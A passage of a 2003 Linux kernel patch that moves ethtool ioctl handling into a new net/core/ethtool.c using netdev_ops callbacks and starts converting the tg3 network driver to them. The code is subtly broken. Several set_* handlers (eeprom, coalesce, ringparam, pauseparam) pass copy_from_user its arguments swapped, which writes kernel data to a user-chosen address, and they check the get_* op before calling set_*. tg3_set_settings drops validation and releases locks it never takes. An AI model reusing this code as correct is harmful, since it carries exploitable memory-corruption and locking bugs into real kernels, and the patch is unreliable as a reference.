*); + void (*get_strings)(struct net_device *, struct ethtool_gstrings *, u8 *); + void (*phys_id)(struct net_device *, u32); + int (*get_stats_len)(struct ethtool_stats *); + void (*get_stats)(struct net_device *, struct ethtool_stats *, u64 *); +}; #include #include @@ -633,6 +732,7 @@ extern int netif_rx(struct sk_buff *skb #define HAVE_NETIF_RECEIVE_SKB 1 extern int netif_receive_skb(struct sk_buff *skb); extern int dev_ioctl(unsigned int cmd, void *); +extern int dev_ethtool(struct ifreq *); extern unsigned dev_get_flags(const struct net_device *); extern int dev_change_flags(struct net_device *, unsigned); extern int dev_set_mtu(struct net_device *, int); Index: net/socket.c =================================================================== RCS file: /var/cvs/linux-2.5/net/socket.c,v retrieving revision 1.21 diff -u -p -r1.21 socket.c --- net/socket.c 17 Jun 2003 11:54:29 -0000 1.21 +++ net/socket.c 17 Jun 2003 11:57:20 -0000 @@ -74,7 +74,6 @@ #include #include #include -#include #include #include #include @@ -1916,10 +1915,7 @@ int sock_unregister(int family) extern void sk_init(void); - -#ifdef CONFIG_WAN_ROUTER extern void wanrouter_init(void); -#endif void __init sock_init(void) { Index: net/core/Makefile =================================================================== RCS file: /var/cvs/linux-2.5/net/core/Makefile,v retrieving revision 1.9 diff -u -p -r1.9 Makefile --- net/core/Makefile 27 May 2003 17:29:33 -0000 1.9 +++ net/core/Makefile 4 Jun 2003 18:39:01 -0000 @@ -10,8 +10,8 @@ obj-y += sysctl_net_core.o endif endif -obj-$(CONFIG_NET) += flow.o dev.o net-sysfs.o dev_mcast.o dst.o neighbour.o \ - rtnetlink.o utils.o link_watch.o filter.o +obj-$(CONFIG_NET) += flow.o dev.o ethtool.o net-sysfs.o dev_mcast.o dst.o \ + neighbour.o rtnetlink.o utils.o link_watch.o filter.o obj-$(CONFIG_NETFILTER) += netfilter.o obj-$(CONFIG_NET_DIVERT) += dv.o Index: net/core/dev.c =================================================================== RCS file: /var/cvs/linux-2.5/net/core/dev.c,v retrieving revision 1.22 diff -u -p -r1.22 dev.c --- net/core/dev.c 2 Jul 2003 22:08:58 -0000 1.22 +++ net/core/dev.c 8 Jul 2003 15:36:35 -0000 @@ -2224,6 +2224,36 @@ int dev_set_mtu(struct net_device *dev, return err; } +/* These are all netdev_op methods in case a driver needs to do something + * different. If we find that all drivers want to do the same thing here, + * we can turn them into dev_() function calls. + */ + +u32 netdev_op_get_link(struct net_device *dev) +{ + return netif_carrier_ok(dev) ? 1 : 0; +} + +u32 netdev_op_get_tx_csum(struct net_device *dev) +{ + return (dev->features & NETIF_F_IP_CSUM) != 0; +} + +u32 netdev_op_get_sg(struct net_device *dev) +{ + return (dev->features & NETIF_F_SG) != 0; +} + +int netdev_op_set_sg(struct net_device *dev, u32 data) +{ + if (data) + dev->features |= NETIF_F_SG; + else + dev->features &= ~NETIF_F_SG; + + return 0; +} + /* * Perform the SIOCxIFxxx calls. @@ -2364,7 +2394,6 @@ static int dev_ifsioc(struct ifreq *ifr, cmd == SIOCBONDSLAVEINFOQUERY || cmd == SIOCBONDINFOQUERY || cmd == SIOCBONDCHANGEACTIVE || - cmd == SIOCETHTOOL || cmd == SIOCGMIIPHY || cmd == SIOCGMIIREG || cmd == SIOCSMIIREG || @@ -2461,13 +2490,26 @@ int dev_ioctl(unsigned int cmd, void *ar } return ret; + case SIOCETHTOOL: + dev_load(ifr.ifr_name); + rtnl_lock(); + ret = dev_ethtool(&ifr); + rtnl_unlock(); + if (!ret) { + if (colon) + *colon = ':'; + if (copy_to_user(arg, &ifr, + sizeof(struct ifreq))) + ret = -EFAULT; + } + return ret; + /* * These ioctl calls: * - require superuser power. * - require strict serialization. * - return a value */ - case SIOCETHTOOL: case SIOCGMIIPHY: case SIOCGMIIREG: if (!capable(CAP_NET_ADMIN)) Index: net/core/ethtool.c =================================================================== RCS file: net/core/ethtool.c diff -N net/core/ethtool.c --- /dev/null 1 Jan 1970 00:00:00 -0000 +++ net/core/ethtool.c 8 Jul 2003 15:29:25 -0000 @@ -0,0 +1,546 @@ +/* + * net/core/ethtool.c - Ethtool ioctl handler + * Split from net/core/dev.c by Matthew Wilcox + * The only entry point in this file is dev_ethtool() and its only caller + * is from net/core/dev.c + * + * It's GPL, stupid. + */ + +#include +#include +#include + +static int ethtool_get_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd = { ETHTOOL_GSET }; + int err; + + if (!dev->netdev_ops->get_settings) + return -EOPNOTSUPP; + + err = dev->netdev_ops->get_settings(dev, &cmd); + if (err < 0) + return err; + + if (copy_to_user(useraddr, &cmd, sizeof(cmd))) + return -EFAULT; + return 0; +} + +static int ethtool_set_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd; + + if (!dev->netdev_ops->set_settings) + return -EOPNOTSUPP; + + if (copy_from_user(&cmd, useraddr, sizeof(cmd))) + return -EFAULT; + + return dev->netdev_ops->set_settings(dev, &cmd); +} + +static int ethtool_get_drvinfo(struct net_device *dev, void *useraddr) +{ + struct ethtool_drvinfo info = { ETHTOOL_GDRVINFO }; + + if (!dev->netdev_ops->get_drvinfo) + return -EOPNOTSUPP; + + dev->netdev_ops->get_drvinfo(dev, &info); + + if (copy_to_user(useraddr, &info, sizeof(info))) + return -EFAULT; + return 0; +} + +static int ethtool_get_regs(struct net_device *dev, char *useraddr) +{ + struct ethtool_regs regs; + struct netdev_ops *ops = dev->netdev_ops; + void *regbuf; + int ret; + + if (!ops->get_regs || !ops->get_regs_len) + return -EOPNOTSUPP; + + if (copy_from_user(®s, useraddr, sizeof(regs))) + return -EFAULT; + + regbuf = kmalloc(ops->get_regs_len(®s), GFP_KERNEL); + if (!regbuf) + return -ENOMEM; + + ops->get_regs(dev, ®s, regbuf); + + ret = 0; + if (copy_to_user(useraddr, ®s, sizeof(regs))) + ret = -EFAULT; + useraddr += offsetof(struct ethtool_regs, data); + if (copy_to_user(useraddr, regbuf, regs.len)) + ret = -EFAULT; + + kfree(regbuf); + return ret; +} + +static int ethtool_get_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; + + if (!dev->netdev_ops->get_wol) + return -EOPNOTSUPP; + + dev->netdev_ops->get_wol(dev, &wol); + + if (copy_to_user(useraddr, &wol, sizeof(wol))) + return -EFAULT; + return 0; +} + +static int ethtool_set_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol; + + if (!dev->netdev_ops->set_wol) + return -EOPNOTSUPP; + + if (copy_from_user(&wol, useraddr, sizeof(wol))) + return -EFAULT; + + return dev->netdev_ops->set_wol(dev, &wol); +} + +static int ethtool_get_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GMSGLVL }; + + if (!dev->netdev_ops->get_msglevel) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_msglevel(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_msglevel) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_msglevel(dev, edata.data); + return 0; +} + +static int ethtool_nway_reset(struct net_device *dev) +{ + if (!dev->netdev_ops->nway_reset) + return -EOPNOTSUPP; + + return dev->netdev_ops->nway_reset(dev); +} + +static int ethtool_get_link(struct net_device *dev, void *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GLINK }; + + if (!dev->netdev_ops->get_link) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_link(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_get_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom = { ETHTOOL_GEEPROM }; + + if (!dev->netdev_ops->get_eeprom) + return -EOPNOTSUPP; + + dev->netdev_ops->get_eeprom(dev, &eeprom); + + if (copy_to_user(useraddr, &eeprom, sizeof(eeprom))) + return -EFAULT; + return 0; +} + +static int ethtool_set_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom; + + if (!dev->netdev_ops->get_eeprom) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &eeprom, sizeof(eeprom))) + return -EFAULT; + + return dev->netdev_ops->set_eeprom(dev, &eeprom); +} + +static int ethtool_get_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce = { ETHTOOL_GCOALESCE }; + + if (!dev->netdev_ops->get_coalesce) + return -EOPNOTSUPP; + + dev->netdev_ops->get_coalesce(dev, &coalesce); + + if (copy_to_user(useraddr, &coalesce, sizeof(coalesce))) + return -EFAULT; + return 0; +} + +static int ethtool_set_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce; + + if (!dev->netdev_ops->get_coalesce) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &coalesce, sizeof(coalesce))) + return -EFAULT; + + return dev->netdev_ops->set_coalesce(dev, &coalesce); +} + +static int ethtool_get_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam = { ETHTOOL_GRINGPARAM }; + + if (!dev->netdev_ops->get_ringparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_ringparam(dev, &ringparam); + + if (copy_to_user(useraddr, &ringparam, sizeof(ringparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam; + + if (!dev->netdev_ops->get_ringparam) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &ringparam, sizeof(ringparam))) + return -EFAULT; + + return dev->netdev_ops->set_ringparam(dev, &ringparam); +} + +static int ethtool_get_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam = { ETHTOOL_GPAUSEPARAM }; + + if (!dev->netdev_ops->get_pauseparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_pauseparam(dev, &pauseparam); + + if (copy_to_user(useraddr, &pauseparam, sizeof(pauseparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam; + + if (!dev->netdev_ops->get_pauseparam) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &pauseparam, sizeof(pauseparam))) + return -EFAULT; + + return dev->netdev_ops->set_pauseparam(dev, &pauseparam); +} + +static int ethtool_get_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + + if (!dev->netdev_ops->get_rx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_rx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_rx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_rx_csum(dev, edata.data); + return 0; +} + +static int ethtool_get_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GTXCSUM }; + + if (!dev->netdev_ops->get_tx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_tx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_tx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_tx_csum(dev, edata.data); +} + +static int ethtool_get_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GSG }; + + if (!dev->netdev_ops->get_sg) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_sg(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_sg) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_sg(dev, edata.data); +} + +static int ethtool_self_test(struct net_device *dev, char *useraddr) +{ + struct ethtool_test test; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->self_test || !ops->self_test_len) + return -EOPNOTSUPP; + + if (copy_from_user(&test, useraddr, sizeof(test))) + return -EFAULT; + + data = kmalloc(ops->self_test_len(&test), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->self_test(dev, &test, data); + + ret = 0; + if (copy_to_user(useraddr, &test, sizeof(test))) + ret = -EFAULT; + useraddr += sizeof(test); + if (copy_to_user(useraddr, data, sizeof(u64) * test.len)) + ret = -EFAULT; + + kfree(data); + return ret; +} + +static int ethtool_get_strings(struct net_device *dev, void *useraddr) +{ + struct ethtool_gstrings gstrings; + struct netdev_ops *ops = dev->netdev_ops; + u8 *data; + int ret; + + if (!ops->get_strings || !ops->get_strings_len) + return -EOPNOTSUPP; + + if (copy_from_user(&gstrings, useraddr, sizeof(gstrings))) + return -EFAULT; + + data = kmalloc(ops->get_strings_len(&gstrings), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_strings(dev, &gstrings, data); + + ret= 0; + if (copy_to_user(useraddr, &gstrings, sizeof(gstrings))) + ret = -EFAULT; + useraddr += sizeof(gstrings); + if (copy_to_user(useraddr, data, gstrings.len * ETH_GSTRING_LEN)) + ret = -EFAULT; + + kfree(data); + return ret; +} + +static int ethtool_phys_id(struct net_device *dev, void *useraddr) +{ + struct ethtool_value id; + + if (!dev->netdev_ops->phys_id) + return -EOPNOTSUPP; + + if (copy_from_user(&id, useraddr, sizeof(id))) + return -EFAULT; + + dev->netdev_ops->phys_id(dev, id.data); + return 0; +} + +static int ethtool_get_stats(struct net_device *dev, void *useraddr) +{ + struct ethtool_stats stats; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->get_stats || !ops->get_stats_len) + return -EOPNOTSUPP; + + if (copy_from_user(&stats, useraddr, sizeof(stats))) + return -EFAULT; + + data = kmalloc(ops->get_stats_len(&stats), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_stats(dev, &stats, data); + + ret= 0; + if (copy_to_user(useraddr, &stats, sizeof(stats))) + ret = -EFAULT; + useraddr += sizeof(stats); + if (copy_to_user(useraddr, data, stats.n_stats * sizeof(u64))) + ret = -EFAULT; + + kfree(data); + return ret; +} + +int dev_ethtool(struct ifreq *ifr) +{ + struct net_device *dev = __dev_get_by_name(ifr->ifr_name); + void *useraddr = (void *) ifr->ifr_data; + u32 ethcmd; + + /* XXX: We can make this more finegrained now. Keep existing + * behaviour for the moment. + */ + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + + if (!dev || !netif_device_present(dev)) + return -ENODEV; + + if (!dev->netdev_ops) + goto ioctl; + + if (copy_from_user (ðcmd, useraddr, sizeof (ethcmd))) + return -EFAULT; + + switch (ethcmd) { + case ETHTOOL_GSET: + return ethtool_get_settings(dev, useraddr); + case ETHTOOL_SSET: + return ethtool_set_settings(dev, useraddr); + case ETHTOOL_GDRVINFO: + return ethtool_get_drvinfo(dev, useraddr); + case ETHTOOL_GREGS: + return ethtool_get_regs(dev, useraddr); + case ETHTOOL_GWOL: + return ethtool_get_wol(dev, useraddr); + case ETHTOOL_SWOL: + return ethtool_set_wol(dev, useraddr); + case ETHTOOL_GMSGLVL: + return ethtool_get_msglevel(dev, useraddr); + case ETHTOOL_SMSGLVL: + return ethtool_set_msglevel(dev, useraddr); + case ETHTOOL_NWAY_RST: + return ethtool_nway_reset(dev); + case ETHTOOL_GLINK: + return ethtool_get_link(dev, useraddr); + case ETHTOOL_GEEPROM: + return ethtool_get_eeprom(dev, useraddr); + case ETHTOOL_SEEPROM: + return ethtool_set_eeprom(dev, useraddr); + case ETHTOOL_GCOALESCE: + return ethtool_get_coalesce(dev, useraddr); + case ETHTOOL_SCOALESCE: + return ethtool_set_coalesce(dev, useraddr); + case ETHTOOL_GRINGPARAM: + return ethtool_get_ringparam(dev, useraddr); + case ETHTOOL_SRINGPARAM: + return ethtool_set_ringparam(dev, useraddr); + case ETHTOOL_GPAUSEPARAM: + return ethtool_get_pauseparam(dev, useraddr); + case ETHTOOL_SPAUSEPARAM: + return ethtool_set_pauseparam(dev, useraddr); + case ETHTOOL_GRXCSUM: + return ethtool_get_rx_csum(dev, useraddr); + case ETHTOOL_SRXCSUM: + return ethtool_set_rx_csum(dev, useraddr); + case ETHTOOL_GTXCSUM: + return ethtool_get_tx_csum(dev, useraddr); + case ETHTOOL_STXCSUM: + return ethtool_set_tx_csum(dev, useraddr); + case ETHTOOL_GSG: + return ethtool_get_sg(dev, useraddr); + case ETHTOOL_SSG: + return ethtool_set_sg(dev, useraddr); + case ETHTOOL_TEST: + return ethtool_self_test(dev, useraddr); + case ETHTOOL_GSTRINGS: + return ethtool_get_strings(dev, useraddr); + case ETHTOOL_PHYS_ID: + return ethtool_phys_id(dev, useraddr); + case ETHTOOL_GSTATS: + return ethtool_get_stats(dev, useraddr); + default: + return -EOPNOTSUPP; + } + + ioctl: + if (dev->do_ioctl) + return dev->do_ioctl(dev, ifr, SIOCETHTOOL); + return -EOPNOTSUPP; +} + Index: drivers/net/tg3.c =================================================================== RCS file: /var/cvs/linux-2.5/drivers/net/tg3.c,v retrieving revision 1.16 diff -u -p -r1.16 tg3.c --- drivers/net/tg3.c 14 Jun 2003 22:15:21 -0000 1.16 +++ drivers/net/tg3.c 8 Jul 2003 14:03:04 -0000 @@ -5036,16 +5036,24 @@ static void tg3_set_rx_mode(struct net_d #define TG3_REGDUMP_LEN (32 * 1024) -static u8 *tg3_get_regs(struct tg3 *tp) +static int tg3_get_regs_len(struct ethtool_regs *regs) { - u8 *orig_p = kmalloc(TG3_REGDUMP_LEN, GFP_KERNEL); - u8 *p; + if (regs->len > TG3_REGDUMP_LEN) + regs->len = TG3_REGDUMP_LEN; + return regs->len; +} + +static void tg3_get_regs(struct net_device *dev, struct ethtool_regs *regs, void *p) +{ + struct tg3 *tp = dev->priv; + u8 *orig_p = p; int i; - if (orig_p == NULL) - return NULL; + if (regs->len > TG3_REGDUMP_LEN) + regs->len = TG3_REGDUMP_LEN; + regs->version = 0; - memset(orig_p, 0, TG3_REGDUMP_LEN); + memset(p, 0, TG3_REGDUMP_LEN); spin_lock_irq(&tp->lock); spin_lock(&tp->tx_lock); @@ -5099,390 +5107,291 @@ do { p = orig_p + (reg); \ spin_unlock(&tp->tx_lock); spin_unlock_irq(&tp->lock); - - return orig_p; } -static int tg3_ethtool_ioctl (struct net_device *dev, void *useraddr) +static int tg3_get_settings(struct net_device *dev, struct ethtool_cmd *cmd) { struct tg3 *tp = dev->priv; - struct pci_dev *pci_dev = tp->pdev; - u32 ethcmd; - - if (copy_from_user (ðcmd, useraddr, sizeof (ethcmd))) - return -EFAULT; - switch (ethcmd) { - case ETHTOOL_GDRVINFO:{ - struct ethtool_drvinfo info = { ETHTOOL_GDRVINFO }; - strcpy (info.driver, DRV_MODULE_NAME); - strcpy (info.version, DRV_MODULE_VERSION); - memset(&info.fw_version, 0, sizeof(info.fw_version)); - strcpy (info.bus_info, pci_dev->slot_name); - info.eedump_len = 0; - info.regdump_len = TG3_REGDUMP_LEN; - if (copy_to_user (useraddr, &info, sizeof (info))) - return -EFAULT; - return 0; - } + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + cmd->supported = (SUPPORTED_Autoneg); + + if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) + cmd->supported |= (SUPPORTED_1000baseT_Half | + SUPPORTED_1000baseT_Full); + + if (tp->phy_id != PHY_ID_SERDES) + cmd->supported |= (SUPPORTED_100baseT_Half | + SUPPORTED_100baseT_Full | + SUPPORTED_10baseT_Half | + SUPPORTED_10baseT_Full | + SUPPORTED_MII); + else + cmd->supported |= SUPPORTED_FIBRE; - case ETHTOOL_GSET: { - struct ethtool_cmd cmd = { ETHTOOL_GSET }; + cmd->advertising = tp->link_config.advertising; + cmd->speed = tp->link_config.active_speed; + cmd->duplex = tp->link_config.active_duplex; + cmd->port = 0; + cmd->phy_address = PHY_ADDR; + cmd->transceiver = 0; + cmd->autoneg = tp->link_config.autoneg; + cmd->maxtxpkt = 0; + cmd->maxrxpkt = 0; + return 0; +} - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - cmd.supported = (SUPPORTED_Autoneg); - - if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) - cmd.supported |= (SUPPORTED_1000baseT_Half | - SUPPORTED_1000baseT_Full); - - if (tp->phy_id != PHY_ID_SERDES) - cmd.supported |= (SUPPORTED_100baseT_Half | - SUPPORTED_100baseT_Full | - SUPPORTED_10baseT_Half | - SUPPORTED_10baseT_Full | - SUPPORTED_MII); - else - cmd.supported |= SUPPORTED_FIBRE; +static int tg3_set_settings(struct net_device *dev, struct ethtool_cmd *cmd) +{ + struct tg3 *tp = dev->priv; - cmd.advertising = tp->link_config.advertising; - cmd.speed = tp->link_config.active_speed; - cmd.duplex = tp->link_config.active_duplex; - cmd.port = 0; - cmd.phy_address = PHY_ADDR; - cmd.transceiver = 0; - cmd.autoneg = tp->link_config.autoneg; - cmd.maxtxpkt = 0; - cmd.maxrxpkt = 0; - if (copy_to_user(useraddr, &cmd, sizeof(cmd))) - return -EFAULT; - return 0; + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + if (cmd->autoneg == AUTONEG_ENABLE) { + tp->link_config.advertising = cmd->advertising; + tp->link_config.speed = SPEED_INVALID; + tp->link_config.duplex = DUPLEX_INVALID; + } else { + tp->link_config.speed = cmd->speed; + tp->link_config.duplex = cmd->duplex; } - case ETHTOOL_SSET: { - struct ethtool_cmd cmd; - - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - - if (copy_from_user(&cmd, useraddr, sizeof(cmd))) - return -EFAULT; - - /* Fiber PHY only supports 1000 full/half */ - if (cmd.autoneg == AUTONEG_ENABLE) { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.advertising & - (ADVERTISED_10baseT_Half | - ADVERTISED_10baseT_Full | - ADVERTISED_100baseT_Half | - ADVERTISED_100baseT_Full))) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.advertising & - (ADVERTISED_1000baseT_Half | - ADVERTISED_1000baseT_Full))) - return -EINVAL; - } else { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - } - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - - tp->link_config.autoneg = cmd.autoneg; - if (cmd.autoneg == AUTONEG_ENABLE) { - tp->link_config.advertising = cmd.advertising; - tp->link_config.speed = SPEED_INVALID; - tp->link_config.duplex = DUPLEX_INVALID; - } else { - tp->link_config.speed = cmd.speed; - tp->link_config.duplex = cmd.duplex; - } + tg3_setup_phy(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); - tg3_setup_phy(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); + return 0; +} - return 0; - } +static void tg3_get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info) +{ + struct tg3 *tp = dev->priv; + struct pci_dev *pci_dev = tp->pdev; - case ETHTOOL_GREGS: { - struct ethtool_regs regs; - u8 *regbuf; - int ret; - - if (copy_from_user(®s, useraddr, sizeof(regs))) - return -EFAULT; - if (regs.len > TG3_REGDUMP_LEN) - regs.len = TG3_REGDUMP_LEN; - regs.version = 0; - if (copy_to_user(useraddr, ®s, sizeof(regs))) - return -EFAULT; - - regbuf = tg3_get_regs(tp); - if (!regbuf) - return -ENOMEM; - - useraddr += offsetof(struct ethtool_regs, data); - ret = 0; - if (copy_to_user(useraddr, regbuf, regs.len)) - ret = -EFAULT; - kfree(regbuf); - return ret; - } - case ETHTOOL_GWOL: { - struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; - - wol.supported = WAKE_MAGIC; - wol.wolopts = 0; - if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) - wol.wolopts = WAKE_MAGIC; - memset(&wol.sopass, 0, sizeof(wol.sopass)); - if (copy_to_user(useraddr, &wol, sizeof(wol))) - return -EFAULT; - return 0; - } - case ETHTOOL_SWOL: { - struct ethtool_wolinfo wol; + strcpy(info->driver, DRV_MODULE_NAME); + strcpy(info->version, DRV_MODULE_VERSION); + memset(&info->fw_version, 0, sizeof(info->fw_version)); + strcpy(info->bus_info, pci_dev->slot_name); + info->eedump_len = 0; + info->regdump_len = TG3_REGDUMP_LEN; +} - if (copy_from_user(&wol, useraddr, sizeof(wol))) - return -EFAULT; - if (wol.wolopts & ~WAKE_MAGIC) - return -EINVAL; - if ((wol.wolopts & WAKE_MAGIC) && - tp->phy_id == PHY_ID_SERDES && - !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) - return -EINVAL; +static void tg3_get_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (wol.wolopts & WAKE_MAGIC) - tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; - else - tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; - spin_unlock_irq(&tp->lock); + wol->supported = WAKE_MAGIC; + wol->wolopts = 0; + if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) + wol->wolopts = WAKE_MAGIC; + memset(&wol->sopass, 0, sizeof(wol->sopass)); +} - return 0; - } - case ETHTOOL_GMSGLVL: { - struct ethtool_value edata = { ETHTOOL_GMSGLVL }; - edata.data = tp->msg_enable; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SMSGLVL: { - struct ethtool_value edata; - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; - tp->msg_enable = edata.data; - return 0; - } - case ETHTOOL_NWAY_RST: { - u32 bmcr; - int r; +static int tg3_set_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - tg3_readphy(tp, MII_BMCR, &bmcr); - tg3_readphy(tp, MII_BMCR, &bmcr); - r = -EINVAL; - if (bmcr & BMCR_ANENABLE) { - tg3_writephy(tp, MII_BMCR, - bmcr | BMCR_ANRESTART); - r = 0; - } - spin_unlock_irq(&tp->lock); + if (wol->wolopts & ~WAKE_MAGIC) + return -EINVAL; + if ((wol->wolopts & WAKE_MAGIC) && + tp->phy_id == PHY_ID_SERDES && + !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) + return -EINVAL; - return r; - } - case ETHTOOL_GLINK: { - struct ethtool_value edata = { ETHTOOL_GLINK }; - edata.data = netif_carrier_ok(tp->dev) ? 1 : 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_GRINGPARAM: { - struct ethtool_ringparam ering = { ETHTOOL_GRINGPARAM }; + spin_lock_irq(&tp->lock); + if (wol->wolopts & WAKE_MAGIC) + tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; + else + tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; + spin_unlock_irq(&tp->lock); - ering.rx_max_pending = TG3_RX_RING_SIZE - 1; - ering.rx_mini_max_pending = 0; - ering.rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; - - ering.rx_pending = tp->rx_pending; - ering.rx_mini_pending = 0; - ering.rx_jumbo_pending = tp->rx_jumbo_pending; - ering.tx_pending = tp->tx_pending; + return 0; +} - if (copy_to_user(useraddr, &ering, sizeof(ering))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRINGPARAM: { - struct ethtool_ringparam ering; +static u32 tg3_get_msglevel(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return tp->msg_enable; +} - if (copy_from_user(&ering, useraddr, sizeof(ering))) - return -EFAULT; +static void tg3_set_msglevel(struct net_device *dev, u32 value) +{ + struct tg3 *tp = dev->priv; + tp->msg_enable = value; +} - if ((ering.rx_pending > TG3_RX_RING_SIZE - 1) || - (ering.rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || - (ering.tx_pending > TG3_TX_RING_SIZE - 1)) - return -EINVAL; +static int tg3_nway_reset(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + u32 bmcr; + int r; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); + spin_lock_irq(&tp->lock); + tg3_readphy(tp, MII_BMCR, &bmcr); + tg3_readphy(tp, MII_BMCR, &bmcr); + r = -EINVAL; + if (bmcr & BMCR_ANENABLE) { + tg3_writephy(tp, MII_BMCR, bmcr | BMCR_ANRESTART); + r = 0; + } + spin_unlock_irq(&tp->lock); - tp->rx_pending = ering.rx_pending; - tp->rx_jumbo_pending = ering.rx_jumbo_pending; - tp->tx_pending = ering.tx_pending; - - 